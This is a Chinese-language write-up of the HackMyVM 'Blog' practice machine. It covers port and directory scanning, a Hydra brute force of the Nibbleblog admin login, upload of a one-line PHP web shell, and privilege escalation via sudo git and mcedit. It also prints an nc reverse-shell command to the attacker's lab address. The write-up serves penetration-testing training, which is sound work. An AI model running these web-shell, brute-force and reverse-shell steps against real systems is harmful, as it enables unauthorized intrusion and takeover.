0x01靶机介绍
名称: | HackMyVM :hotle |
---|---|
链接 | https://hackmyvm.eu/machines/machine.php?vm=Blog |
下载地址 | https://downloads.hackmyvm.eu/blog.zip |
作者 | d4t4s3c |
难度 | 较简单 |
0x02环境搭建
1. 下载靶机
链接直接下载(谷歌盘)
不放图了
看官网好像不支持VM 这次用VirtualBox
本次用桥接模式 攻击机在VM 也是桥接
0x03靶机渗透
攻击机使用Kali-Linux 2022.1 (IP:192.168.68.78)
1. 主机发现
arp-scan -l
扫描内网机器发现目标主机 192.168.68.155
2. 端口扫描
nmap -sC -p- 192.168.68.155 -v
发现端口 80 22
4. web信息收集
访问80端口 应该是ping命令的回显 我们看看还有什么其他东西
源码里没有东西
扫一下目录 看看有什么其他页面
gobuster dir -q -r -u http://192.168.68.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
-q
-r
-u
-w
有一个状态码403估计是错扫
访问下另外两个看下
第一个文件和首页也一样。
试试第二个,192.168.68.155/server-status, 它得到一个blog页面
查看源码,应该是这个这个程序搭建的 Nibbleblog
谷歌搜了下
可能存在任意文件上传漏洞。 我们进去看看
看了下CVE 提供的信息。需要版本号4.0.5之前。并且要管理员权限才可以执行。
扫一下博客的目录、看看有什么
打开README看看
没有版本号信息。
我们在已知某个版本存在漏洞,那么就先尝试能否进入后台
有/admin.php 后台页面
5.后台密码爆破
尝试爆破一下
抓一下包看看是什么形式
post发包
我们尝试Hydra 爆破一下账号密码
hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-post-form://192.168.68.155/my_weblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password."
- 参数详解:
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)
在密码本中找到正确密码 爆破成功
爆破一半靠运气一半靠字典。 真实场景很小的概率会成功
输入账号admin 密码kisses 成功登陆后台
6.任意文件上传漏洞
漏洞是管理员可以从“Plugins > Plugin :: My image”上传任何文件。我们可以从路径“/content/private/plugins/my_image/image.php”找到上传的脚本。
编写php一句话。
vi cmd.php
<?php system($GET['cmd']); ?>
进入后台上传
提示成功
我们去漏洞的说明 直接访问漏洞位置执行命令
成功执行
7.反弹shell
nc监听9001端口
执行命令
成功获得
但是只有www-data权限
8.提权
使用python获得完整交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
设置xterm环境变量
export TERM=xterm
获得完整交互式命令
Ctrl+z快捷键
stty -a
stty raw -echo;fg
resset
查看可用权限 sudo -l
发现个可以用admin权限执行的git应用
使用git提权
https://gtfobins.github.io/gtfobins/git/#sudo
sudo -u admin /usr/bin/git -p help config
!/bin/sh
提权成功
9.寻找敏感信息
看一下当前用户的目录 home 找到个user.txt 查看
发现疑似falg
提交成功了。
10.尝试提权root
查看admin的权限
有个可以root执行的编辑器。
谷歌了下 发现个 Midnight Commander mcedit缓冲区溢出漏洞
mcedit编辑器提权
还是sudo提权,使用root权限执行mcedit
sudo -u root /usr/bin/mcedit
根据查找到的漏洞进行利用 点击蓝色左上角 出现菜单
双击 Invoke 'shell'
会返回shell命令行 可以看到 已经是root权限了
但是只有一小块 我们反弹shell 开个新窗口
2.监听root权限的shell
新建个窗口 随便监听个端口
在刚才获取到root权限的窗口 执行命令
nc -e /bin/bash 192.168.68.78 1234
获取到了root权限的shell
查看root目录下有什么
获取到flag
0x04总结
此靶场主要考察目录枚举、模糊测试、http暴力枚举、反弹shell、shell提权,漏洞利用等内容
Comments | NOTHING
Warning: Invalid argument supplied for foreach() in /www/wwwroot/blog.lw.al/wp-content/themes/Sakura/functions.php on line 1093